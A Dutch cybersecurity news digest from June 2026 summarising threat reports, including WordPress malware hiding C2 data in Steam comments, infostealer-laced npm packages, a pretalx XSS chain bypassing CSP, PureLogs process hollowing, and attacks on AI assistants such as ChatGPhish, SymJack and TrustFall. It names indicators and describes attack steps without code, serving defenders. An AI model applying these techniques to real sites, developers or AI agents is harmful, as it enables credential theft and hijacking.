De FakeUpdates-lokmiddelen bevatten valse updateberichten voor browsers zoals Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet en UC Browser. De ClickFix-aanvallen omvatten PowerShell-commando's. Een specifiek geval, belicht in het SilentPush-rapport, betreft een valse update voor Firefox die een ZIP-archief downloadde met meerdere DLL's en een kwaadaardig uitvoerbaar bestand genaamd ‘Browser Update.exe’.
De onderzoekers identificeerden acht technische vingerafdrukken die aan de campagne zijn gekoppeld en die hielpen bij het identificeren van de DriveSurge-infrastructuur en gecompromitteerde websites. Hieronder valt een JavaScript-injectie volgens het patroon ‘t.js?site= ’, waarbij een unieke waarde aan elke gecompromitteerde website wordt toegekend. Door analyse ontdekte SilentPush meer dan 80 kwaadaardige injectiedomeinen en een reeks voorbereide domeinen die nog niet in aanvallen waren gebruikt. Bovendien ontdekten de onderzoekers een geobfusceerde JavaScript-payload die specifiek is ontworpen om macOS-desktopsystemen aan te vallen. Deze payload werd geleverd via verificatie-gerelateerde ClickFix-aanvallen die het klembord kapen, wat aangeeft dat de campagne verder reikt dan Windows. Gebruikers wordt aangeraden browserupdates alleen te downloaden via de instellingen van hun applicatie (Over > Controleren op updates) en geen commando's uit te voeren in de Windows-opdrachtprompt of Terminal die ze niet volledig begrijpen.
Bron: SilentPush | Bron 2: hubs.li
02 juni 2026 | WordPress malware verbergt C2-data in Steam-profielen met onzichtbare Unicode
Een recente malwarecampagne heeft bijna 2.000 WordPress websites geïnfecteerd door op ingenieuze wijze command-and-control (C2) data te verbergen in commentaren op Steam Community profielen. De dreigingsactor maakt gebruik van onzichtbare Unicode-tekens om een payload te coderen die een URL naar een kwaadaardig script opbouwt. Door het platform van Valve te misbruiken, vermijdt de aanvaller het onderhouden van een aparte C2-infrastructuur en omzeilt deze traditionele detectiemethoden.
De campagne werd voor het eerst ontdekt in juli 2025. Sindsdien hebben beveiligingsexperts van GoDaddy malware aangetroffen op ongeveer 1.980 WordPress websites. Het is onduidelijk hoe de hackers de websites precies compromitteren, maar onderzoekers vermoeden dat de initiële infectievector varieert van gestolen admin-inloggegevens of gecompromitteerde FTP/SFTP-referenties tot de exploitatie van een kwetsbaar WordPress thema of plugin, of een supply chain compromis.
De eerste stage malware die op een website wordt geplaatst, gebruikt WordPress paginaloads om specifieke Steam-profielen te benaderen en tekst uit onschuldig lijkende commentaren te extraheren. Deze tekst bevat echter verborgen Unicode-tekens die kwaadaardige payloads verhullen, soms vermomd als ASCII-kunst.
GoDaddy onderzoekers beschrijven in een rapport dat de dreigingsactor zes onzichtbare Unicode-tekens gebruikt voor de gecodeerde payload: Zero-width non-joiner (U+200C), Zero-width joiner (U+200D), Function application (U+2061), Invisible times (U+2062), Invisible separator (U+2063) en Invisible plus (U+2064). De decoder negeert alle zichtbare tekens en koppelt de onzichtbare aan een overeenkomstig nummer; vervolgens worden deze omgezet naar een binaire representatie en worden bytes gereconstrueerd uit de binaire stroom. Deze codering stelt binaire data in staat om te worden ingebed in normaal ogende tekst, waarbij de zichtbare tekens dienen als camouflage terwijl de onzichtbare tekens de daadwerkelijke payload dragen.
Volgens de onderzoekers wordt de gedecodeerde payload gebruikt om een `hello-mywordl[.]info` URL op te bouwen. Deze URL dient JavaScript-code die in elke frontend WordPress pagina wordt geïnjecteerd. Op basis van de bestandsnamen, zoals `asahi-jquery-min-bundle` en `lodash.core.min.js`, wordt de opgehaalde malware vermomd als een legitieme JavaScript-bibliotheek. De laatste fase van de aanval is de implementatie van een backdoor die reageert op speciaal geconstrueerde POST-verzoeken die een specifieke authenticatie cookie bevatten. Als de `tEcaKKXEsb` cookie aanwezig is, accepteert de backdoor base64 gecodeerde PHP code via een POST-parameter.
GoDaddy beschrijft verschillende ontwijkingsmechanismen die door de malware worden gebruikt, waaronder geobfusceerde strings met octale en hexadecimale escapes, gerandomiseerde functienamen, nep uitgeschakelde loggingcode en het gebruik van standaard API's van WordPress, waardoor de malware zich vermengt met normale activiteit.
Website-eigenaren kunnen zich verdedigen door te controleren op verwijzingen naar Steam Community URL's, verdachte externe JavaScript-injecties, uitgaande verbindingen van WordPress servers naar Steam, en onverwachte scripts die laden vanaf domeinen zoals `hello-mywordl[.]info`. Andere indicatoren zijn onzichtbare Unicode-tekens, verdachte `_transient_caption_` cache-ingangen, uitgeschakelde SSL-verificatie in cURL-verzoeken en POST-verzoeken die de authenticatie cookies of de `new_code` parameter van de malware bevatten. De onderzoekers adviseren beveiligingsteams om prioriteit te geven aan het herstellen vanaf een bekende goede backup van vóór de infectiedatum. Indien dit niet mogelijk is, moet het handmatige schoonmaakproces grondig zijn, omdat aanvallers de verwijderde code opnieuw kunnen installeren via de backdoor als een component actief blijft.
Bron: Australische overheid | Bron 2: godaddy.com | Bron 3: hubs.li
02 juni 2026 | Tientallen Red Hat npm packages besmet met infostealer malware
Aanvallers hebben tientallen npm packages van Red Hat voorzien van infostealer malware, zo is recentelijk bekendgemaakt. Deze kwaadaardige software is specifiek ontworpen om diverse gevoelige gegevens, ook wel "secrets" genoemd, van besmette systemen te stelen.
Volgens StepSecurity zijn er maar liefst 31 gecompromitteerde packages geïdentificeerd, die gezamenlijk meer dan 100.000 wekelijkse downloads genereren. De specifieke packages die het betreft vallen onder de noemer @redhat-cloud-services npm packages. Ontwikkelaars die deze besmette pakketten downloaden en installeren, riskeren directe infectie van hun ontwikkelomgeving.
De malware wordt door StepSecurity omschreven als een uiterst effectieve 'credential harvester'. Deze functionaliteit stelt de malware in staat om een breed scala aan secrets, credentials en tokens te verzamelen. Tot de doelwitten behoren gevoelige toegangsgegevens voor kritieke ontwikkel- en cloudplatformen, waaronder GitHub Actions, AWS (Amazon Web Services), GCP (Google Cloud Platform), Azure (Microsoft Azure), Kubernetes, HashiCorp Vault, npm en CircleCI.
Naast het stelen van deze waardevolle gegevens, richt de malware zich ook op de softwareprojecten waar de getroffen ontwikkelaar aan werkt. Een bijzonder zorgwekkend aspect van de aanval is de methode waarmee de aanvallers hun invloed proberen uit te breiden. Met de gestolen npm tokens tracht de malware besmette versies te publiceren van andere packages waar het slachtoffer beheerderstoegang toe heeft. Dit kan leiden tot een verdere verspreiding van de malware binnen de supply chain.
Cybersecuritybedrijf JFrog Security heeft de aanval toegeschreven aan een specifieke groep aanvallers, bekend onder de naam TeamPCP. Deze groep heeft in het verleden al een spoor van vergelijkbare supply chain aanvallen achtergelaten. Eerdere slachtoffers van TeamPCP omvatten prominente organisaties en projecten zoals SAP, Checkmarx, Lightning, Intercom, Trivy en GitHub zelf. De aanhoudende activiteit van TeamPCP onderstreept de noodzaak voor organisaties en ontwikkelaars om hun software supply chain zorgvuldig te beveiligen en alert te zijn op verdachte activiteiten binnen hun ontwikkelprocessen.
Bron: StepSecurity en JFrog Security | Bron 2: github.com
02 juni 2026 | Zero-Click kwetsbaarheid in XSS in pretalx maakt accountovername mogelijk
Cybersecurityonderzoekers van het bedrijf Novee Security hebben een gevaarlijke kwetsbaarheid ontdekt in pretalx, populaire open-source software, die cybercriminelen in staat stelt accounts van organisatoren volledig over te nemen zonder dat zij een enkele link hoeven aan te klikken. Het betreft een stored Cross-Site Scripting (XSS) kwetsbaarheid met een hoge ernst, aangeduid als CVE-2026-41241, en heeft een hoge CVSS-score van 8.7.
Pretalx wordt veel gebruikt voor het beheren van Call for Papers (CFP)-processen en planning voor evenementen variërend van hacker-camps tot academische symposia. De kwetsbaarheid werd geanalyseerd door Elad Meged, een founding engineer en beveiligingsonderzoeker bij Novee. Hij merkte op dat, hoewel verschillende evenementen van buitenaf onafhankelijk lijken, ze op dezelfde onderliggende codebase draaien. Dit betekent dat één enkele kwetsbaarheid een systemische blootstelling creëert binnen de hele sector.
De blogpost van Novee, gedeeld met Hackread.com, onthult dat de aanvalsvector lage privileges en lage complexiteit vereist. Elke geregistreerde gebruiker kan deze misbruiken door eenvoudigweg HTML of JavaScript in de zoekbalk-dropdown aan de organisatorzijde te plaatsen. Hierbij wordt de conferentiewebsite misleid om kwaadaardige code uit te voeren die is verborgen in normale presentatie-inzendingen.
Onderzoekers leggen uit dat pretalx een strikt Content Security Policy (CSP) hanteert met `script-src ‘self’` en HTML5 `innerHTML` scriptonderdrukking om ongeautoriseerde code-uitvoering te voorkomen. Aanvallers kunnen deze verdedigingsmechanismen echter volledig omzeilen via een geketende exploit. Hierbij uploaden ze een `.js` payload-bestand, vermomd als normaal leermateriaal of dia's, naar het CFP-platform. Omdat het bestand direct op het platform wordt opgeslagen, neemt het de domeinoorsprong van de site over. De aanvaller plaatst vervolgens een `iframe`-tag in de titel van de inzending.
Wanneer een organisator zoekt naar veelvoorkomende woorden zoals "intro" of "machine learning", wordt de titel door de "typeahead" zoekfunctie gerenderd. Het `srcdoc`-attribuut creëert een nieuwe documentcontext die het HTML5-scriptblok omzeilt. Omdat pretalx een `frame-src`-richtlijn mist, voert de `iframe` het geüploade script uit, waardoor het CSP-filter wordt gepasseerd. Dit geeft het script volledige toegang tot de sessie van de organisator voor directe overname, gegevensdiefstal en geautomatiseerde acceptatie van sprekers.
De analyse onthulde ook een secundaire techniek die helemaal geen JavaScript vereist. Door een `image`-tag in een inzendingstitel te plaatsen, maakt de browser automatisch een geauthenticeerd GET-verzoek om de afbeeldingsbron te laden. Op het moment dat de zoekresultaten worden gerenderd, activeert dit verzoek een "superuser-demotion"-endpoint, waardoor de admin-privileges van de organisator permanent worden ingetrokken.
Verder bleek uit het onderzoek hoe dreigingsactoren geautomatiseerde AI-softwareagenten kunnen gebruiken om deze kwetsbaarheid op grotere schaal te misbruiken. Ze kunnen een agent inzetten om openbare pretalx-implementaties te scrapen, aangepaste presentatie-samenvattingen te genereren met behulp van grote taalmodellen (LLM's), en tegelijkertijd tientallen conferenties automatisch te overspoelen met de kwaadaardige payload. Ze hoeven alleen de zoektermen te targeten die organisatoren het meest gebruiken om hun eigen inzendingen geaccepteerd te krijgen, waardoor ze theoretisch een acceptatiegraad van 100% kunnen behalen voor 40 of meer conferenties.
Traditionele applicatiebeveiligingstools falen om deze aanvallen te detecteren. Onderzoekers merkten op: “Statische analyse markeert `innerHTML`. DAST-scanners herhalen payloads tegen formulieren.” Ze legden uit dat, hoewel tools individuele bugs als laag risico classificeren, ze niet kunnen modelleren hoe een autonome agent deze onderdelen kan samenvoegen tot een volledige keten.
Novee heeft het pretalx-team en maker Tobias Kunze geprezen voor een snelle en coöperatieve reactie. De kwetsbaarheid is officieel gepatcht op 27 mei 2026, in pretalx versie v2026.1.0.
Bron: Novee Security | Bron 2: github.com | Bron 3: nvd.nist.gov
02 juni 2026 | OpenAI Codex authenticatietokens gestolen via malafide npm-pakket en Android-applicaties
Onderzoekers op het gebied van cybersecurity hebben details bekendgemaakt over een nieuwe kwaadaardige aanval op de toeleveringsketen, gericht op ontwikkelaars die OpenAI Codex gebruiken via een legitiem ogende webinterface op afstand. Het betreft het npm-pakket `codexui-android`, dat op GitHub en npm wordt geadverteerd als een webinterface voor OpenAI Codex en meer dan 29.000 wekelijkse downloads aantrekt. Het pakket is nog steeds beschikbaar via de repository.
Deze activiteit is opmerkelijk omdat het geen traditionele aanval betreft die gebruikmaakt van typosquatting of wegwerppakketten om ontwikkelaars te misleiden. In plaats daarvan is de kwaadaardige code ingebed in een functioneel npm-pakket dat actief is ontwikkeld. De bijbehorende GitHub-repository is nog steeds schoon. Volgens Charlie Eriksen, onderzoeker bij Aikido Security, heeft elke aanroep van het pakket in de afgelopen maand stilzwijgend authenticatietokens van Codex geëxfiltreerd naar een server die onder controle staat van de aanvallers.
De schadelijke wijzigingen zouden ongeveer een maand na de publicatie van het pakket in het register zijn geïntroduceerd, waarschijnlijk in een poging om gebruikersvertrouwen op te bouwen en het bereik te vergroten. Het npm-account dat aan het pakket is gekoppeld, is "friuns", ook bekend als Igor Levochkin.
In het pakket bevindt zich code die de inhoud van het `~/.codex/auth.json` bestand van Codex extraheert en deze exfiltreert naar een externe server, `sentry.anyclaw[.]store`, die zich voordoet als Sentry, een legitiem platform voor applicatiemonitoring en foutopsporing. De vastgelegde gegevens omvatten de `access_token`, `refresh_token`, `id_token` en account-ID. Eriksen benadrukt dat de `refresh_token` niet verloopt, waardoor een aanvaller die deze in handen heeft, zich onbeperkt en stilzwijgend kan voordoen als het slachtoffer. Een gestolen Codex `refresh_token` geeft meer dan alleen toegang tot een chatinterface; het biedt persistente, stille toegang tot alles wat dat account kan doen.
OpenAI waarschuwt in zijn ondersteuningsdocumentatie dat gebruikers `~/.codex/auth.json` moeten behandelen als een wachtwoord, omdat het toegangstokens bevat. Het wordt afgeraden om het te committen, in tickets te plakken of in chats te delen.
Het npm-pakket is niet de enige methode die de dreigingsactor gebruikt om Codex-ontwikkelaars aan te vallen. Aikido heeft een Android-applicatie waargenomen met de naam "OpenClaw Codex Claude AI Agent" (pakketnaam: `gptos.intelligence.assistant`), die het npm-pakket uitvoert binnen zijn PRoot-sandbox en de Codex-referenties naar hetzelfde eindpunt stuurt. De APK-applicatie zelf is klein (26 MB) en ziet er schoon uit bij een Play-scan voorafgaand aan publicatie. Bij de eerste uitvoering extraheert het een van Termux afgeleide Linux-gebruikersomgeving naar de privéopslag van de applicatie en voert Node.js daarin uit via PRoot. De versie is niet vastgepind, dus het apparaat haalt op wat momenteel op npm is gepubliceerd. De exfiltratie is al aanwezig sinds `codexui-android@0.1.82`. Het pakket draait binnen de PRoot-sandbox van de applicatie, waar de in-app Codex-aanmelding zijn `auth.json` schrijft. Zodra de gebruiker is aangemeld, leest het pakket dat bestand uit de sandbox en verzendt het de volledige OAuth-blob naar `sentry.anyclaw.store/startlog`.
De Android-applicatie, uitgebracht door een entiteit genaamd "BrutalStrike", heeft meer dan 50.000 downloads. Dezelfde exfiltratieketen is ook gesignaleerd in een tweede Android-applicatie die gekoppeld is aan BrutalStrike: "Codex" (pakketnaam: `codex.app`), die meer dan 10.000 keer is gedownload. De overige drie applicaties die de ontwikkelaar aanbiedt, bevatten deze functionaliteit niet.
Na contact op te nemen met de pakketauteur op GitHub, meldde Aikido dat deze aanvankelijk een opmerking plaatste waarin stond dat de toegang tot het npm-account was verloren. Vervolgens bewerkte de auteur de reactie en plaatste een andere waarin werd beweerd dat "dit probleem intern wordt onderzocht" en dat "de betreffende functionaliteit en gerelateerde gegevens zijn verwijderd". De auteur beweerde verder dat er geen referentiegegevens met derden zijn gedeeld, zonder te antwoorden waarom deze code alleen in de npm-pakketbuild was ingevoegd of waarom er überhaupt toegang tot de Codex-tokens nodig was. Het X-profiel dat aan de auteur is gekoppeld, bevat het domein `anyclaw[.]store`. WHOIS-records geven aan dat het domein op 12 april 2026 werd geregistreerd, slechts twee dagen nadat de allereerste versie van het npm-pakket (versie 0.1.72) naar npmjs[.]com werd geüpload.
Deze ontwikkeling komt op een moment dat dreigingsactoren steeds vaker echte tools en workflows voor ontwikkelaars van kunstmatige intelligentie (AI) aanvallen om referenties te stelen en dieper in de software-toeleveringsketen door te dringen.
Eind vorige maand ontdekte een Belgisch beveiligingsbedrijf ook dat een verwijderde Google API-sleutel tot 23 minuten lang actief blijft, een venster dat een aanvaller met toegang tot een gelekte sleutel kan benutten om toegang te krijgen tot gebruikersgegevens en andere API’s, inclusief die gerelateerd aan Google Gemini. De gemiddelde intrekkingstijd bedraagt ongeveer 16 minuten. Onderzoeker Joe Leon stelde dat een aanvaller met een verwijderde sleutel verzoeken kan blijven verzenden totdat deze een server bereikt die nog niet is bijgewerkt. Indien Gemini op het project is ingeschakeld, kunnen aanvallers geüploade bestanden dumpen en gecachte gesprekken exfiltreren. Hoewel Google aanvankelijk besloot het probleem niet te verhelpen, met de verklaring dat het een "bekende eigenschap van het systeem en geen beveiligingsprobleem" was, heeft de techgigant sindsdien besloten het te behandelen als een P0-bug, wat betekent dat het een ernstig probleem is dat onmiddellijk moet worden aangepakt. De bevindingen, net als een vergelijkbaar exploitatievenster van 4 seconden dat eerder werd waargenomen met verwijderde Amazon Web Services (AWS) toegangssleutels, benadrukken hoe vertragingen bij het intrekken van referenties exploiteerbaar zijn en kunnen worden gebruikt om ongeautoriseerde toegang te verkrijgen tot cloudomgevingen, terwijl verdedigers ervan uitgaan dat de referenties zijn ingetrokken.
Bron: Aikido Security | Bron 2: github.com | Bron 3: offensai.com
02 juni 2026 | E-mails met valse aankooporders verspreiden fileless malware van PureLogs via RAR-archieven
FortiGuard Labs heeft een nieuwe e-mailcampagne onthuld die Windows-gebruikers aanvalt met een datastelend programma genaamd PureLogs. De aanval begint met e-mails met valse aankooporders die slachtoffers verleiden een kwaadaardig archief te openen, genaamd "PO 2026-P0803.rar".
Na het openen van het archief wordt automatisch een verborgen script, "kpankocrs.js", uitgevoerd. Dit script plaatst een willekeurig genoemd bestand, zoals "ps_qnSEGUkU0LIY_1777592585573.ps1", in de map "C:\Temp". Het maakt gebruik van de script engine van Windows (wscript.exe) om PowerShell te activeren en systeembeperkingen te omzeilen.
De aanvallers passen de techniek process hollowing toe om detectie te voorkomen. Hierbij wordt een legitiem Windows-proces, in dit geval "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe", gekaapt. De veilige code van dit proces wordt vervangen door een kwaadaardige downloader module. Dit kapen gebeurt via specifieke commando's van het systeem: CreateProcessA() opent het legitieme programma in een bevroren staat, ZwUnmapViewOfSection() leegt het geheugen, WriteProcessMemory() injecteert de kwaadaardige code, en ResumeThread() dwingt de computer om de verborgen dreiging uit te voeren.
Zodra de malware actief is binnen MsBuild.exe, wordt een interne module genaamd "Iwnflr.exe" geëxtraheerd om de volgende fase te starten. Dit bestand laadt de bron "Eqxcpvgf.Ybrgdoxas" via ResourceManager.GetObject(). Vervolgens wordt deze bron ontsleuteld met het DES-algoritme en gedecomprimeerd met Gunzip, waarna een downloader met de naam "Rmiyj.dll" wordt samengesteld.
De taak van deze downloader is om een verbinding tot stand te brengen met een externe C2-server op 77.83.39.211 via poort 8443 voor het verzenden van webverzoeken. Dit leidt tot het ophalen van de uiteindelijke payload. Eerst wordt een HTTP GET-verzoek naar het "/ping"-endpoint gestuurd om te bevestigen dat de server actief is, gevolgd door een HTTP POST-verzoek naar het "/plugin"-endpoint om een fileless variant van PureLogs genaamd "zgSGkYYzqVe.dll" te downloaden. Door de uitvoering in het geheugen van deze plugin blijven er geen sporen achter op de fysieke harde schijf.
De PureLogs malware begint vervolgens met het stelen van gevoelige gegevens, gericht op een breed scala aan browsers, cryptocurrency wallets en applicaties. Het steelt opgeslagen inloggegevens, geschiedenis en cookies van Chrome, Firefox, Brave, Vivaldi en Microsoft Edge. Daarnaast richt het zich op bestanden van crypto wallets, privésleutels en transactiegeschiedenissen van Bitcoin Core, Dogecoin Core, Litecoin Core, Exodus en Atomic Wallet.
Bovendien bemachtigt de malware Discord-authenticatietokens en accountwachtwoorden van Outlook, FileZilla, ProtonVPN en OpenVPN. De laatste stap is het bundelen van de gestolen gegevens met een JPEG-screenshot van het bureaublad, systeem informatie, klembord gegevens en de gebruikersnaam. Dit datapakket wordt geserialiseerd, gecomprimeerd met GZip en versleuteld met een AES-sleutel. De versleutelde bundel wordt vervolgens via HTTP POST-verzoeken naar de "/browser" en "/discord"-endpoints naar de server van de aanvallers verzonden.
De beveiligingsfilters van FortiMail hebben deze phishing-e-mails onderschept en de onderwerpregel gemarkeerd als "virus detected", waardoor de kwaadaardige bestanden de inboxen van gebruikers niet konden bereiken. Om de risico's van deze ontwijkende campagne te beperken, adviseren onderzoekers organisaties om strikte e-mailfiltering toe te passen, onnodige scriptuitvoering uit te schakelen en actief te monitoren op afwijkende PowerShell-activiteit en process hollowing.
Diverse cybersecurity experts hebben hun inzichten gedeeld. Jason Soroko, Senior Fellow bij Sectigo, benadrukte dat de campagne aantoont hoe dreigingsactoren zich succesvol verbergen binnen normale zakelijke activiteiten en tools voor systeembeheer, waarbij process hollowing wordt gebruikt om een .NET downloader in een vertrouwde Windows MSBuild executable te injecteren. Kern Smith, Senior Vice President van Global Solutions Engineering bij Zimperium, waarschuwde dat beveiligingsteams verder moeten kijken dan de zichtbaarheid van endpoints en verdachte activiteiten vroegtijdig moeten kunnen identificeren en correleren over mobiele apparaten, applicaties en endpoints. Maxime Cartier, Vice President of Human Risk bij Hoxhunt, legde uit dat het menselijke element een primaire barrière blijft, aangezien de aanvalsketen volledig afhangt van het openen van een kwaadaardige bijlage, wat de noodzaak van een gedragsmatige benadering van beveiligingsrisico's onderstreept.
Bron: FortiGuard Labs
03 juni 2026 | Valsche ChatGPT-apps verspreiden wachtwoordstelende malware via advertenties
Hackers misbruiken steeds vaker vertrouwde kunstmatige intelligentie (AI)-platforms zoals ChatGPT en Claude om gebruikers aan te vallen. Recentelijk werd een kwetsbaarheid genaamd ClaudeBleed ontdekt, die ongeautoriseerde browser-extensies in staat stelde de interface van Anthropic Claude te kapen. Nu maken aanvallers misbruik van de officiële functionaliteiten van deze AI tools om malware te verspreiden en tegelijkertijd webfilters en beveiligingscontroles te omzeilen.
Beveiligingsonderzoek van Push Security onthult een campagne genaamd LLMShare, die gebruikmaakt van zogenaamde InstallFix-aanvallen. Deze aanvallen, een variant van de ClickFix-familie, exploiteren het feit dat AI tools de installatie via de commandoregel hebben genormaliseerd, zelfs voor gebruikers die onvoldoende ervaring hebben om legitieme terminalcommando's van kwaadaardige te onderscheiden. Hackers gebruikten de functionaliteit voor het renderen van code van ChatGPT om een valse storingsmelding te creëren binnen een echte link. Deze pagina beweerde dat de webversie tijdelijk niet beschikbaar was en drong er bij gebruikers op aan een desktopapplicatie te downloaden, waarna zij werden omgeleid naar een website die leek op de originele: openew.app.
Deze downloadwebsite was slim ontworpen om kwaadaardige uitvoerbare bestanden te leveren, ontwikkeld voor zowel Windows als macOS. Op Mac-apparaten werd de payload geïdentificeerd als Odyssey Stealer, een variant van Atomic macOS Stealer die zich richt op in browsers opgeslagen wachtwoorden, cryptowallets en sessietokens. De downloadwebsite maakte gebruik van een techniek voor conditionele weergave om detectie van malware te voorkomen. Wanneer geautomatiseerde scanners, zoals URLScan, de link controleerden, maskeerde de website zichzelf door een onschadelijke website van een virtual reality-bedrijf te tonen, terwijl echte gebruikers de malwareval zagen.
Een andere kwetsbaarheid, genaamd ChatGPhish, werd ontdekt en gerapporteerd door Permiso Security. Deze kwetsbaarheid richt zich op de manier waarop ChatGPT Markdown-inhoud verwerkt bij het samenvatten van websites van derden. Onderzoekers merkten op dat een aanvaller kwaadaardige code in een gewone webpagina kan injecteren. Wanneer een gebruiker ChatGPT vervolgens vraagt die pagina samen te vatten, haalt de AI automatisch de live, klikbare phishinglinks, QR-codes of valse beveiligingswaarschuwingen van de aanvaller rechtstreeks in de vertrouwde chatinterface. Dit is geen kwetsbaarheid van de browser, maar een probleem waarbij door aanvallers gecontroleerde inhoud wordt weergegeven als vertrouwde gebruikersinterface binnen de LLM-ervaring.
Daarnaast rapporteerde Adversa AI twee kritieke technieken gericht op ontwikkelaars: SymJack en TrustFall. SymJack is een aanval die AI-codeerassistenten misleidt tot een ogenschijnlijk onschuldige bestandskopie die hun eigen configuratiebestanden overschrijft, leidend tot uitvoering van code op afstand. TrustFall is een methode die kwaadaardige software-opslagplaatsen gebruikt om gevaarlijke commando's automatisch goed te keuren via het Model Context Protocol (MCP) zonder gebruikersakkoord.
Deze campagnes voor het stelen van informatie hebben gevaarlijke reële gevolgen. Het IBM X-Force 2026 Threat Intelligence Index-rapport toonde aan dat meer dan 300.000 ChatGPT-inloggegevens al zijn gelekt op het darkweb.
Bron: permiso.io | Bron 2: adversa.ai
03 juni 2026 | De browser als frontlinie voor AI-beveiliging tegen geavanceerde cyberaanvallen
Beveiligingsteams worden geconfronteerd met een tweeledig probleem op het gebied van kunstmatige intelligentie (AI). Aan de ene kant gebruiken aanvallers AI om phishingkits te verbeteren, overtuigende lokmiddelen te genereren en hun infrastructuur sneller te wisselen dan traditionele blokkeerlijsten kunnen bijhouden. Aan de andere kant omarmen werknemers AI tools in hoog tempo, vaak zonder adequate beveiligingscontroles. Dit leidt ertoe dat gevoelige gegevens in Large Language Models (LLM's) worden geplakt, OAuth-rechten worden verleend aan AI-agents, en ongecontroleerde AI-browser-extensies worden geïnstalleerd. Beide problemen manifesteren zich primair in de browser, wat deze tot een cruciale frontlinie maakt voor moderne cyberbeveiliging.
Volgens onderzoek van Push Security versnelt AI de ontwikkeling van aanvallershulpmiddelen. Phishing-as-a-Service (PhaaS) tools en kits worden sneller gecreëerd en geüpdatet. Een voorbeeld hiervan is de snelle evolutie van ClickFix, dat nieuwe technieken zoals InstallFix en ConsentFix introduceert. Een andere zorgwekkende ontwikkeling is 'device code phishing', een methode die misbruik maakt van legitieme OAuth-stromen om Multi-Factor Authenticatie (MFA) en passkeys volledig te omzeilen. Deze techniek is in 2026 geëxplodeerd, waarbij het aantal actieve kits met een factor 18 is toegenomen en detecties 37 keer vaker voorkomen. Cybercrimegroepen zoals ShinyHunters en BlackFile maken uitgebreid gebruik van dergelijke kits, waaronder Doko's Panel en afgeleide varianten, waarin zwaar AI-gebruik is waargenomen. Overvloedige commentaren in de paginacode worden gezien als een duidelijke indicator van ontwikkeling met assistentie van AI.
De effectiviteit van detecties gebaseerd op Indicators of Compromise (IoC's) neemt af. AI verlaagt de kosten voor het opzetten van overtuigende phishing-infrastructuur aanzienlijk. Een geloofwaardige phishingpagina kan binnen enkele minuten worden 'vibecoded', geïmplementeerd op een nieuw domein, slachtoffers maken en weer worden verwijderd voordat reputatiediensten deze kunnen markeren. Spamhaus rapporteert dat 89% van de phishingdomeinen minder dan twee dagen actief is. Voor organisaties die vertrouwen op blokkeerlijsten en IoC-feeds, is elke phishingaanval effectief een zero-day. Bovendien wordt misbruik gemaakt van legitieme sites voor het hosten en leveren van phishinglinks, zoals te zien is bij de LLMShare-campagne, die legitieme chatgpt.com-sharinglinks gebruikt voor malvertising via zoekmachineadvertenties die extreem moeilijk te herkennen zijn.
AI maakt het ook eenvoudiger om campagnes via meerdere kanalen op te zetten. Gegevens van Push Security tonen aan dat ongeveer 1 op de 3 phishing-payloads via andere kanalen dan e-mail arriveert, zoals malvertising, sociale media en SEO-poisoning. Bij ClickFix-campagnes komt zelfs 4 op de 5 payloads specifiek via resultaten van zoekmachines binnen. Beveiliging van e-mail is structureel blind voor deze snelgroeiende leveringskanalen. De browser, waar payloadlevering en overname van accounts daadwerkelijk plaatsvinden, is daarom de laag waar detectie moet opereren, door het analyseren van paginagedrag, scriptuitvoering en kwaadaardige mechanismen zoals sessiediefstal, kopiëren en plakken, en bestanddownloads.
Bron: Push Security
03 juni 2026 | Red Hat verwijdert software na supply chain aanval via gecompromitteerd GitHub-account
Red Hat heeft maandag tientallen softwarepakketten uit zijn distributiepijplijn verwijderd, nadat aanvallers een gecompromitteerd GitHub-account hadden gebruikt om malware voor het stelen van inloggegevens te verspreiden onder ontwikkelaars. Volgens de voorlopige analyse van het bedrijf werd via het gecompromitteerde GitHub-account kwaadaardige code verspreid naar klanten, waarbij 32 pakketten werden getroffen die wekelijks ongeveer 117.000 keer werden gedownload. Red Hat heeft de getroffen pakketten sindsdien verwijderd en stelt dat "op basis van de huidige bevindingen geen acties van klanten vereist zijn."
De aanval maakte gebruik van een variant van de Mini Shai-Hulud zelfverspreidende worm, waarvan de volledige broncode op 12 mei online werd gepubliceerd door de cybercriminele groep TeamPCP. Zoals cybersecuritybedrijf Tenable opmerkte, kondigden de criminelen "gelijktijdig een wedstrijd van $1.000 aan op BreachForums voor de grootste supply chain aanval met behulp van de code." Of de aanval van maandag werd uitgevoerd door TeamPCP zelf of door een andere actor die de gepubliceerde code gebruikte, kon niet onmiddellijk worden vastgesteld, aldus onderzoekers.
Palo Alto Networks' Unit 42 waarschuwde dat het openbaar maken van de broncode van de worm al tot copycat-activiteiten heeft geleid, waardoor definitieve attributie moeilijker wordt en dat Mini Shai-Hulud "niet langer beperkt is tot TeamPCP." De malware van de aanval, die de auteurs Miasma noemden, verschilde slechts cosmetisch van het origineel van TeamPCP; verwijzingen naar de sciencefictionreeks Dune werden vervangen door Griekse mythologie, terwijl de onderliggende functionaliteit voor het stelen van inloggegevens intact bleef.
De aanval van maandag is de meest recente in een reeks supply chain inbreuken die teruggaan tot september 2025, toen de originele Shai-Hulud worm leidde tot een CISA-advies, en die enkele van 's werelds meest gebruikte ontwikkelaarstools hebben getroffen. Recente incidenten omvatten een aanval in maart op LiteLLM, waardoor cybercriminelen verschillende organisaties konden binnendringen, waaronder AI-recruitmentbedrijf Mercor. De aanval op LiteLLM werd gevolgd door een aparte reeks compromitteringen die werden toegeschreven aan Noord-Koreaanse hackers, gericht op de axios JavaScript-bibliotheek. Die campagne bracht Charles Carmakal, Chief Technology Officer van Mandiant, ertoe te waarschuwen dat "de geheimen die de afgelopen twee weken zijn gestolen, de komende dagen, weken en maanden meer supply chain aanvallen, compromitteringen van Software-as-a-Service omgevingen, ransomware- en afpersingsincidenten, en cryptodieften mogelijk zullen maken."
In mei bevestigde GitHub dat het was gecompromitteerd door TeamPCP nadat een apparaat van een werknemer was gecompromitteerd via een kwaadaardige Visual Studio Code-extensie, waarbij de groep $50.000 eiste voor gestolen broncode en dreigde deze gratis te lekken als er geen koper kwam. OpenAI had ook gewaarschuwd dat twee van zijn werknemersapparaten in dezelfde golf waren gecompromitteerd, na een supply chain aanval op de open source bibliotheek TanStack. Ten tijde van de LiteLLM-compromittering waarschuwde Adam Reynolds, senior security researcher bij Sonatype, dat omdat "de malware een breed scala aan inloggegevens target... dit het potentieel creëert voor tweede- en derderangs effecten die zich in de loop van de tijd kunnen verspreiden, leidend tot verdere inbreuken, serviceonderbrekingen of misbruik van gevoelige gegevens ver buiten het initiële compromitteringspunt."
Bron: Red Hat | Bron 2: tenable.com | Bron 3: unit42.paloaltonetworks.com
